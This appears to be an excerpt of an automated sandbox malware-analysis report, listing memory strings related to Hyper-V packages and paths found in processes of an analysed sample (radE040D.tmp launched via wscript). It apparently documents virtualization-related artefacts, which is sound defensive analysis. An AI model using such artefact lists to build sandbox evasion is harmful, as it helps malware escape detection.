Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumummUR
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239\$-
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.muml
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84\f
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\7c7\i
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2.manifest2
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb.manifest
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catNW[
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catcat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_d4bc3c4a770c0641.manifestA
Source: radE040D.tmp, 00000004.00000003.7082846453.000000000387B000.00000004.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.Types.ps1xml.format.ps1xml
Source: radE040D.tmp, 00000004.00000003.7127160132.000000000310D000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat2\
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d.manifest
Source: radE040D.tmp, 00000004.00000003.7168740992.0000000003103000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumm
Source: csrss.exe, 00000008.00000002.6858402624.00000000038A1000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.17134.1_none_9cb6bf37d3c2efb9\Hyper-V.Format.ps1xmlmof
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_170afe8321651ef9.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df.manifest
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1t
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-f..wallrules.resources_31bf3856ad364e35_10.0.17134.1_en-us_7d008f07cc0acfbc.manifest
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1/
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb.manifestifest:
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\J
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177\vmsynthfcvdev.dlldll
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17.manifestn
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a\
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmpBinary or memory string: Hyper-V.FormatMsDtc.psd1
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7126538222.0000000003154000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1134.1,]Y
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.17134.1_en-us_8e782c7a46f14b49\m5
Source: radE040D.tmp, 00000004.00000003.7106645105.000000000387B000.00000004.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1format.ps1xmlxmlg
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum.cats
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f.manifestc
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat1.catg
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824\
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7130318718.000000000311F000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat64
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hypervisor-events_31bf3856ad364e35_10.0.17134.1_none_93bac8ae42b1f037B
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84.manifest
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumu
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff\vmms.exe.mui.mui
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\
Source: radE040D.tmp, 00000004.00000003.7169001015.0000000003118000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat9eN
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmpBinary or memory string: osoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catt0T
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hypervisor-events_31bf3856ad364e35_10.0.17134.1_none_93bac8ae42b1f0379
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\G
Source: radE040D.tmp, 00000004.00000003.7010053770.00000000031C1000.00000004.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.17134.1B
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096\\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb\7c9a\
Source: csrss.exe, 00000005.00000002.6800329255.0000000000A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6845940415.0000000000A12000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cataty
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..ients-firewallrules_31bf3856ad364e35_10.0.17134.1_none_d07683518a4c2ec2.manifestV
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.48_none_d4ed173f61801406.manifest
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum4
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat:
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catum
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\}
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bef40208ce4908\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239\
Source: radE040D.tmp, 00000004.00000003.7169001015.0000000003118000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumRd
Source: radE040D.tmp, 00000004.00000003.6912935631.00000000037EC000.00000004.sdmpBinary or memory string: 14e59f622dbe\Hyper-V.Types.ps1xmlxml9
Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2\
Source: radE040D.tmp, 00000004.00000003.7129876000.00000000040CD000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat11
Source: radE040D.tmp, 00000004.00000003.7131622681.0000000003178000.00000004.sdmpBinary or memory string: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catt
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_6340c1c9612e407b.manifest8
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a\amd64_microsoft-windows-acledit_31bf3856ad364e35_10.0.17134.1_none_4d620c9fc5bc5c30\c9amd64_microsoft-onecore-cdp-winrt_31bf3856ad364e35_10.0.17134.1_none_492d582f5cbd45f0\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0\0e5bamd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84\amd64_microsoft-onecore-quiethours_31bf3856ad364e35_10.0.17134.1_none_8e6c6b9a9f19e7c7\amd64_microsoft-onecore-encdump_31bf3856ad364e35_10.0.17134.1_none_c9af4ac1de264540\d7amd64_microsoft-onecore-uiamanager_31bf3856ad364e35_10.0.17134.1_none_b5bc4f47f4347c9a\amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\amd64_microsoft-onecore-sharehost_31bf3856ad364e35_10.0.17134.1_none_d2d7886a87bde445\amd64_microsoft-windows-aadjcsp_31bf3856ad364e35_10.0.17134.1_none_600d1259ff3335b6\c9amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bef40208ce4908\vmsmb.dll.muiuil
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.17134.1_en-us_8e782c7a46f14b49.manifestb
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261.manifest/
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bef40208ce4908.manifest
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum4.1m)RT
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catattl
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum1{R&
Source: radE040D.tmp, 00000004.00000003.7129876000.00000000040CD000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat1$
Source: radE040D.tmp, 00000004.00000003.7130318718.000000000311F000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catatt
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catdersR,
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat=
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum\*_
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_iastorv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_ce7487caeb282db1\7b9famd64_ialpssi_i2c.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_0a046d4df7f0ac7b\amd64_hyperv-vmsynthnic.resources_31bf3856ad364e35_10.0.17134.1_en-us_32a65f534e80b7d2\amd64_iastorav.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_d010957a22aa6cc2\b86camd64_microsoft-windows-cmisetup_31bf3856ad364e35_10.0.17134.112_none_fc7bc47aae4d520f\amd64_hyperv-vmicvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_05720885d49a5857\amd64_ipmidrv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_2d93a60324c5d86c\80amd64_itsas35i.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_f441e46bcde20aea\amd64_hyperv-vmserial.resources_31bf3856ad364e35_10.0.17134.1_en-us_6d3c997783423a80\amd64_intelpep.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_b919ba664eb8a174\amd64_hyperv-vmiccore.resources_31bf3856ad364e35_10.0.17134.1_en-us_b801a316901bad5b\amd64_keyboard.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_14295de0d5889a92\amd64_hyper
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_c8885d1044f785b1.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8\
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumi
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_356d3b5898bc1c7d.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab503\
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3\X
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumm
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cataW|
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1tm
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8.manifest-
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1UVz
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumum*C
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum/
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cate
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat>U
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c\
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb.manifeststah
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catxD
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b.manifest{
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.17134.1_en-us_662e0a371a2edd22\
Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_hyperv-vmserial.resources_31bf3856ad364e35_10.0.17134.1_en-us_6d3c997783423a80\amd64_hyperv-vmemulateddevices_31bf3856ad364e35_10.0.17134.81_none_a622801bed1b811f\amd64_hyperv-vmiccore.resources_31bf3856ad364e35_10.0.17134.1_en-us_b801a316901bad5b\amd64_ipmidrv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_2d93a60324c5d86c\5b86camd64_intelpep.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_b919ba664eb8a174\bamd64_keyboard.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_14295de0d5889a92\amd64_hyperv-vmsynthnic.resources_31bf3856ad364e35_10.0.17134.1_en-us_32a65f534e80b7d2\amd64_microsoft-windows-cmisetup_31bf3856ad364e35_10.0.17134.112_none_fc7bc47aae4d520f\amd64_ialpssi_i2c.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_0a046d4df7f0ac7b\amd64_hyperv-vpci-rootporterr_31bf3856ad364e35_10.0.17134.1_none_4b48602cec1be5d9\b86camd64_ipoib6x.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_e59925927d88680e\444amd64_ialpssi_gpio.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_a649fe25b1990444\amd64
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat\*`
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catK
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.14.1tX
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3.manifestL
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841ddd.manifest
